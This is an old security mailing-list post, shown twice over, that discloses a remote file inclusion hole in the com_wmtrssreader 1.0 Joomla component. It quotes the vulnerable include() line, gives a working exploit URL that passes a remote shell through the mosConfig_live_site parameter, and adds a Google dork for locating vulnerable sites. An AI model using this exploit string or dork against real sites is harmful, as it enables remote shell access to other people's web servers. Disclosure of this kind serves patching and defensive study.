BugTraq
Back to list
|
Post reply
wmtrssreader joomla component 1.0 Remote File Include Vulnerability
Oct 10 2007 06:47AM
cyber-crime sibersavascilar com
########################################################################
#################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability
Component : com_wmtrssreader version 1.0
Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
Dicovered by : Cyber-Crime
Contact : cyber-crime (at) hotmail (dot) com [email concealed]
Orginal : http://www.sibersavascilar.com/category/security
========================================================================
==========================================================
# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php
include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );
# Exploit
http://localhost/path/administrator/components/com_wmtrssreader/admin.wm
trssreader.php?mosConfig_live_site=sh3ll?
# google dork
inurl:com_wmtrssreader
========================================================================
==========================================================
# Greetz : www.sibersavascilar.com www.sibersavascilar.net www.sibersavascilar.org
========================================================================
==========================================================
########################################################################
#################################
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#################################
# wmtrssreader joomla component 1.0 Remote File Include Vulnerability
Component : com_wmtrssreader version 1.0
Download script : http://www.webmaster-tips.net/flash-rss-reader.html (you must register)
Dicovered by : Cyber-Crime
Contact : cyber-crime (at) hotmail (dot) com [email concealed]
Orginal : http://www.sibersavascilar.com/category/security
========================================================================
==========================================================
# Vulnerable found in /administrator/components/com_wmtrssreader/admin.wmtrssreader.php
include( "$mosConfig_live_site/components/com_wmtrssreader/about.html" );
# Exploit
http://localhost/path/administrator/components/com_wmtrssreader/admin.wm
trssreader.php?mosConfig_live_site=sh3ll?
# google dork
inurl:com_wmtrssreader
========================================================================
==========================================================
# Greetz : www.sibersavascilar.com www.sibersavascilar.net www.sibersavascilar.org
========================================================================
==========================================================
########################################################################
#################################
[ reply ]